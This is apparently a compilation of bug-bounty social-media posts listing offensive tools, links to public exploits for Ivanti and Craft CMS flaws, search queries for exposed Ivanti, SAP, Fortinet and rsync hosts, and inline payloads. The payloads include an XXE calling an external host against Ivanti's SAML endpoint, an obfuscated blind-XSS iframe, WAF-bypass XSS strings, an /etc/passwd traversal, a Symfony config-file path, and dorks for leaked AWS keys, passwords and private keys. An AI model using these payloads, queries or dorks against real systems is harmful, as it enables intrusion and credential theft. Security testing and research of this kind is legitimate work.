SpideyX - A Web Reconnaissance Penetration Testing tool for Penetration Testers and Ethical Hackers that included with multiple mode with asynchronous concurrne performance. Spideyx is a tool that have 3 seperate modes and each mode are used for different approach and different methods, Spideyx is one tool but it equal to 3 tools because it have ability to crawling, Jsscraping, parameter fuzzing.

https://github.com/RevoltSecurities/Spideyx
#tools #cybersec #bugbountytips

⚡️ Poc CVE-2025-0282
✅ Ivanti Connect Secure zero-day


Hunter :

product.name="Ivanti Connect Secure"||http://product.name="Ivanti Policy Secure"||http://product.name="Ivanti Neurons for ZTA"

⬇️ Link:
https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit

#poc #cve #infosec

AungRecon

AungRecon is a comprehensive, automated reconnaissance script for web application security assessments. It performs multiple security checks and scans on a target domain, including subdomain enumeration, SQL injection, XSS, open redirects, LFI vulnerabilities, and more. The tool integrates several popular security tools, streamlining the workflow of security analysts and penetration testers.

Features :

WhatWeb Scan: Identifies technologies, plugins, and versions used by the target website.
Subdomain Enumeration: Discovers and filters alive subdomains.
Subdomain Takeover Detection: Identifies possible subdomain takeovers.
SQL Injection Detection: Searches for SQLi vulnerabilities using parameterized URLs.
Cross-Site Scripting (XSS) Detection: Scans for XSS vulnerabilities.
Open Redirect Detection: Finds possible open redirect vulnerabilities.
Local File Inclusion (LFI) Detection: Identifies possible LFI vulnerabilities.
Nuclei Vulnerability Scans: Executes multiple vulnerability templates via Nuclei.

Link:

https://github.com/aungsanoo-usa/aungrecon?tab=readme-ov-file

Installation:

Clone the repository:
git clone https://github.com/aungsanoo-usa/aungrecon.git
cd aungrecon
chmod +x install.sh
chmod +x aungrecon.sh

Usage: To run AungRecon on a target domain, simply execute the script with the following command:
./install.sh
./aungrecon.sh

Injectra: Payload Injection via File Magic Numbers

Injectra is a robust tool designed for injecting custom payloads into files based on their magic numbers. By leveraging this technique, Injectra modifies files for penetration testing and security research purposes. The tool detects the file type by analyzing its magic numbers and injects the payload seamlessly into the correct position.

Features

- Magic Number-Based Payload Injection: Identifies file types using magic numbers and injects payloads precisely into their headers.

- Customizable Payloads: Supports user-defined payloads, with a default PHP-based payload for command execution.

- Broad File Type Support: Compatible with file types like zip, rar, docx, jpg, png, pdf, and more.

- Interactive CLI: Includes features like auto-completion for file paths and detailed prompts to guide users.

- Dependency Management: Automatically checks and installs required Python packages.

https://github.com/AnonKryptiQuz/Injectra

#tools #payload #injection

Finding the real IP behind Cloudflare has never been so easy. Here you are a tool to search on shodan

starting from a simple favicon

- https://github.com/pielco11/fav-up

#infosec #cybersec #bugbountytips

Quick and dirty way to find parameters vulnerable to LFI & Path Traversal & SSRF & Open Redirect:

Burp Search > Regex
\?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w])

And find potentially vulnerable SSRF params

- https://github.com/In3tinct/See-SURF

A Python based scanner to find potential SSRF parameters in a web application. See-SURF helps you detect potential SSRF parameters and validates the finding it by making a DNS/HTTP request back to your server. It can be added to your arsenal of recon while doing bug hunting/web security testing.




#SSRF #cybersec #lfi

CVE-2024-22024, XXE on Ivanti Connect Secure

payload , encode it to base64:

<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r>

</r> send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest

#bugbountytips #cve #infosec

⚠️ Alert
CVE-2025-0070 and CVE-2025-0066 : Two Critical Vulnerabilities in NetWeaver AS for ABAP and ABAP Platform

📊 3.2K+ Services are found on hunter.how yearly.

🔗Hunter Link:hunter.how/list?searchVal…

👇Query
HUNTER :product.name="SAP NetWeaver AS for ABAP"

Refer:securityonline.info/critical-sap-f…

#hunterhow #infosec #infosecurity #OSINT #Vulnerability

Some essential HTTP status Codes

#BugBounty #bugbountytips #cybersecurity #cybersecuritytips

⚠️ Alert

CVE-2024-55591 : Zero-Day Vulnerability in Attacks on Fortinet Firewalls with Exposed Interfaces


🔗Hunter Link:hunter.how/list?searchVal…

👇Query

HUNTER :product.name="Fortinet Firewall"

FOFA : product="FORTINET-Firewall"

📰Refer:securityonline.info/active-exploit…

#FORTINET #hunterhow #infosec #infosecurity #OSINT #fofa #Vulnerability #zeroday

Blind XSS in Private crypto target
Payload used

"><iframesrcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;#116;&#116;&#112;&#115;&#58;&#47;&#47;test.bxss.in&#34;&#59;&#117;&#109;&#101;&#110;&#116;&#46;&#62;">

#bugbountytips #bugbounty #payload

Bypass Cloudflare WAF (DOM-based XSS) ♻️

Payload:
'-alert?.(1)-'

writeup: 1337.or.id/post/stored-do…

#infosec #cybersec #bugbountytips

🐞 Bug Bounty Tip:

If you find Web frameworks like Symfony, add /app_dev.php/_profiler/open?file=app/config/parameters.yml to the wordlist, and you may get juicy data.

#bugbountytips #tips #cybersec #bugbounty

Uncover sensitive info with: inurl:notepad.link + keyword

Some example keywords:
aws_secret_access_key, "username=" "password=", VISA, PRIVATE KEY, "authToken="

More cool unpublished Dorks:

http://github.com/fatguru/dorks

#bugbountytip

⚡️ XSS Payload

Payload:

1%27;--<img%20src=x%20onerror=javascript:alert(document.domain)> 

#bugbountytips #xss #bugbounty #infosecc #cybersec

🚨 [CVE-2024-56145] Exploit released! 🚨

Details, PoC, and setup instructions:
🔗 https://github.com/Chocapikk/CVE-2024-56145

Learn more:
📖 https://assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms

#bugbountytips #BugBounty

🔖Top 25 JavaScript path files used to store sensitive information in Web Application⬇️

01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js
10. /js/authorization.js 
11. /js/encryption.js
12. /js/certificates.js
13. /js/ssl_keys.js
14. /js/passphrases.js 
15. /js/policies.js
16. /js/permissions.js 
17. /js/privileges.js
18. /js/hashes.js
19. /js/salts.js
20. /js/nonces.js
21. /js/signatures.js
22. /js/digests.js
23. /js/tokens.js
24. /js/cookies.js
25. /js/topsecr3tdonotlook.js

#InfoSec #CyberSecurity #Hacking #BugBounty #bugbountyTools #bugbountytips #Pentest #Fuzzing

Plution is a convenient way to scan at scale for pages that are vulnerable to client side prototype pollution via a URL payload. In the default configuration, it will use a hardcoded payload that can detect 11 of the cases documented

⬇️ LINK:
- https://github.com/raverrr/plution


How to use:

Basic scan, output only to screen:
cat URLs.txt | plution

Scan with a supplied payload rather than hardcoded one:

cat URLs.txt|plution -p '__proto__.zzzc=example'

Note on custom payloads: The variable you are hoping to inject must be called or render to "zzzc". This is because 'window.zzzc' will be run on each page to verify pollution.

Output:

Passing '-o' followed by a location will output only URLs of pages that were successfully polluted.

Concurrency:

Pass the '-c' option to specify how many concurrent jobs are run (default is 5)

#infosec #cybersec #bugbountytips

⚠️ Alert ⚠️

CVE-2024-12084(CVSS 9.8) : Heap overflow that could lead to remote code execution

🔗Hunter Link:hunter.how/list?searchVal…

👇 Query
HUNTER : product.name="rsync"
FOFA : product="rsync"
SHODAN : product:"rsyncd"

📰 Refer:access.redhat.com/security/cve/C…

securityonline.info/cve-2024-12084…

sysdig.com/blog/detecting…

#RSYNC#hunterhow #infosec #infosecurity #OSINT #Vulnerability

Before intercepting even a single request in burp, enable the Binary and Images filter in the proxy history. maybe it hitting up Directory Traversals catching

load_image?img=assets/imgs/logo.png with ../../../../../etc/passwd

#infosec #cybersec #bugbountytips

📮 Pentesting Bluetooth: The Practical Guide to Hacking Bluetooth Low Energy

1. https://blog.attify.com/the-practical-guide-to-hacking-bluetooth-low-energy/
2. https://pentestpartners.com/security-blog/introduction-to-bluetooth-low-energy/
3. https://book.hacktricks.xyz/todo/radio-hacking/pentesting-ble-bluetooth-low-energy

#infosec #bluetooth